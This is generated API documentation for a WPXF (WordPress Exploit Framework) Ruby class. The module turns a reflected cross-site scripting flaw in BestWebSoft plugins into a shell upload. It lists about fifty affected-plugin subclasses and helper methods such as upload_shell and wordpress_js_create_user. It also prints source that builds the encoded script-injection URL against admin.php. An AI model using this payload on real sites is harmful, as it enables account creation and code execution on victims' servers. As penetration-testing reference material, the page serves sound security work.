Class: Wpxf::Exploit::BwsPanelReflectedXssShellUpload
- Includes:
- WordPress::ReflectedXss
- Defined in:
- lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb
Direct Known Subclasses
AdsensePluginReflectedXssShellUpload, BwsGoogleMapsReflectedXssShellUpload, BwsPortfolioReflectedXssShellUpload, CaptchaReflectedXssShellUpload, CarRentalReflectedXssShellUpload, ContactFormMultiReflectedXssShellUpload, ContactFormReflectedXssShellUpload, ContactFormtoDBReflectedXssShellUpload, CustomAdminPageReflectedXssShellUpload, CustomFieldsSearchReflectedXssShellUpload, CustomSearchReflectedXssShellUpload, DonateReflectedXssShellUpload, EmailQueueReflectedXssShellUpload, ErrorLogViewerReflectedXssShellUpload, FacebookButtonReflectedXssShellUpload, FeaturedPostsReflectedXssShellUpload, GalleryCategoriesReflectedXssShellUpload, GalleryReflectedXssShellUpload, GoogleAnalyticsReflectedXssShellUpload, GoogleCaptchaReflectedXssShellUpload, GooglePlusOneReflectedXssShellUpload, GoogleShortlinkReflectedXssShellUpload, GoogleSitemapReflectedXssShellUpload, HtaccessReflectedXssShellUpload, JobBoardReflectedXssShellUpload, LatestPostsReflectedXssShellUpload, LimitAttemptsReflectedXssShellUpload, LinkedInReflectedXssShellUpload, MultilanguageReflectedXssShellUpload, PDFPrintReflectedXssShellUpload, PaginationReflectedXssShellUpload, PinterestReflectedXssShellUpload, PopularPostsReflectedXssShellUpload, PosttoCSVReflectedXssShellUpload, ProfileExtraFieldsReflectedXssShellUpload, PromoBarReflectedXssShellUpload, QuotesandTipsReflectedXssShellUpload, RatingReflectedXssShellUpload, RealityReflectedXssShellUpload, ReattacherReflectedXssShellUpload, RelevantRelatedReflectedXssShellUpload, SMTPReflectedXssShellUpload, SenderReflectedXssShellUpload, SocialButtonsPackReflectedXssShellUpload, SocialLoginReflectedXssShellUpload, SubscriberReflectedXssShellUpload, TestimonialsReflectedXssShellUpload, TimesheetReflectedXssShellUpload, TwitterButtonReflectedXssShellUpload, UpdaterReflectedXssShellUpload, UserRoleReflectedXssShellUpload, VisitorsOnlineReflectedXssShellUpload
Constant Summary
Constants included from WordPress::Options
WordPress::Options::WP_OPTION_CONTENT_DIR
Constants included from Net::HttpOptions
Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST
Instance Attribute Summary
Attributes inherited from Module
#active_workspace, #event_emitter, #payload, #session_cookie
Attributes included from Options
Instance Method Summary collapse
- #check ⇒ Object
- #fixed_version ⇒ Object
-
#initialize ⇒ BwsPanelReflectedXssShellUpload
constructor
A new instance of BwsPanelReflectedXssShellUpload.
- #plugin_name ⇒ Object
- #url_with_xss ⇒ Object
- #vulnerable_url ⇒ Object
Methods included from WordPress::ReflectedXss
Methods included from WordPress::Xss
#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script
Methods included from WordPress::Plugin
#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute
Methods included from Net::HttpServer
#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server
Methods included from Wpxf
app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version
Methods inherited from Module
#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option
Methods included from Db::Credentials
Methods included from ModuleAuthentication
#authenticate_with_wordpress, #requires_authentication
Methods included from WordPress::Urls
#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc
Methods included from WordPress::Options
Methods included from WordPress::Login
#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body
Methods included from WordPress::Fingerprint
#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version
Methods included from Net::HttpClient
#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri
Methods included from Net::TyphoeusHelper
#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options
Methods included from Net::UserAgent
#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent
Methods included from Versioning::OSVersions
#random_nt_version, #random_osx_version
Methods included from Versioning::BrowserVersions
#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version
Methods included from Options
#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option
Methods included from OutputEmitters
#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning
Methods included from ModuleInfo
#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info
Constructor Details
#initialize ⇒ BwsPanelReflectedXssShellUpload
Returns a new instance of BwsPanelReflectedXssShellUpload.
6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 6 def initialize super update_info( name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload', author: [ 'DefenseCode', # Discovery 'rastating' # WPXF module ], references: [ ['WPVDB', '8796'], ['URL', 'http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf'] ], date: 'Apr 12 2017' ) end |
Instance Method Details
#check ⇒ Object
23 24 25 26 27 28 |
# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 23 def check return :unknown if plugin_name.nil? return :vulnerable if fixed_version.nil? check_plugin_version_from_readme(plugin_name, fixed_version) end |
#fixed_version ⇒ Object
34 35 36 |
# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 34 def fixed_version nil end |
#plugin_name ⇒ Object
30 31 32 |
# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 30 def plugin_name nil end |
#url_with_xss ⇒ Object
42 43 44 |
# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 42 def url_with_xss "#{vulnerable_url}?page=bws_panel&category=%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22" end |
#vulnerable_url ⇒ Object
38 39 40 |
# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 38 def vulnerable_url normalize_uri(wordpress_url_admin, 'admin.php') end |